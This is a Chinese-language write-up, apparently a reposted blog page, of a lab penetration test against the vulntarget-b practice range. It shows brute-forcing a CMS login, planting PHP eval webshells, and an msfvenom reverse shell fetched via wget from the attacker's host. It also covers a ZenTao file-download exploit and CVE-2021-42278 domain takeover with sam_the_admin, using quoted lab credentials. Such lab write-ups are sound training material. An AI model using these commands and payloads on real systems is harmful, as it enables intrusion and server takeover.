IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> vulntarget-b -> 正文阅读

[PHP知识库]vulntarget-b


前言

靶场是vulntarget-b,环境可以自己百度下载
拓扑图:
在这里插入图片描述


一、centerOS7

1.扫描IP

nmap -F 192.168.252.3-254

在这里插入图片描述

2.扫描服务

sudo nmap -sV -p 21-10000 192.168.252.151

在这里插入图片描述
浏览器访问http://192.168.252.151:81/,发现是一个极致CMS

3.漏洞利用

上网查询了漏洞,发现需要登陆到后台才行,使用burp进行爆破
在这里插入图片描述
密码是admin123
在这里插入图片描述
参考了这篇文章https://blog.csdn.net/zhangge3663/article/details/116430637
下载插件
在这里插入图片描述
接着安装
在这里插入图片描述
点击配置,输入密码,随便输入即可,但是要记住,接着再输入一次就可以打开编辑模式
在这里插入图片描述
打开index.php,添加一句话木马,点击左上角保存
在这里插入图片描述
使用蚁剑连接
在这里插入图片描述
连接后发现输入每一个命令都是无效,需要disable_function绕过,使用蚁剑自带的插件即可
在这里插入图片描述
开启msf
在这里插入图片描述
生成payload

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.252.139 LPORT=4444 -f elf -o linuxshell.elf

通过蚁剑上传到目标机并且执行

wget http://192.168.252.139/linuxshell.elf
chmod 777 linuxshell.elf
./linuxshell.elf

在这里插入图片描述
在这里插入图片描述
设置路由以及代理
在这里插入图片描述


二、win10域环境

1.扫描IP

使用msf的portscan,扫描常见端口
在这里插入图片描述
结果发现另外一个IP:10.0.20.66
在这里插入图片描述

扫描端口过程真的是久,我放弃了,直接访问8080端口
使用浏览器访问http://10.0.20.66:8080,发现是一个禅道CMS

2.漏洞利用

上网查找文章找到了这一篇https://blog.csdn.net/qq_36197704/article/details/109385695,但是需要登陆到后台才行,但是发现爆破过程中会对登陆次数进行限制,所以我这里直接拿账号与密码进行登陆,有两个POC,但是第一个无法起作用,只能使用第二个,首先上次PHP文件到centerOS中5.php

<?php echo "<?php eval(\$_REQUEST['aaa']);";

访问URL

http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6ODEvNS5waHA=

其中base64内容是HTTP://10.0.20.30:81/5.php,这里http需要大写。使用蚁剑连接http://10.0.20.66:8080/data/client/1/5.php即可。

把payload上传发现上传失败,会不会有杀软,使用命令:

tasklist /svc

发现有火绒,需要使用免杀payload(免杀的方法网上很多)
在这里插入图片描述
获取shell,设置路由代理
在这里插入图片描述

三、域控Windows server2016

由于是域控,所以使用一些域渗透知识,但是我发现使用net view 等这些命令没有反应,想使用之前的方法扫描IP,结果扫着扫着就断了,使用frp建立隧道来进行扫描,结果扫了好久都没扫完。只能看WP了,这里使用的是CVE-2021-42278,首先要获取域管理员的账号和密码,meterpreter中
在这里插入图片描述
这里有管理员的账号和密码(如果没有的话需要还原虚拟机,这个好像会过期),使用Python脚本(https://github.com/WazeHell/sam-the-admin)

python sam_the_admin.py "vulntarget.com/administrator:Admin@123" -dc-ip 10.0.10.100 -shell

只有Admin@123这个密码是可以访问到域控。等待后就获取shell。不过这个脚本不能cd,查看flag

type C:\Users\Administrator\flag.txt

总结

这一次渗透有域,但是不能使用net view这些命令,需要做凭证。我对域渗透还是有些不了解,需要多多补充这些知识点。还有就是查找漏洞利用时没有仔细看清楚利用过程,在利用禅道CMS中忽略了base64内容的HTTP需要大写,而且加载PHP文件时需要输出内容到win10的PHP文件中,这里我没有仔细看清楚。这里要吸取教训。

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-04-29 11:54:39  更:2022-04-29 11:54:41 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/18 18:35:19-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码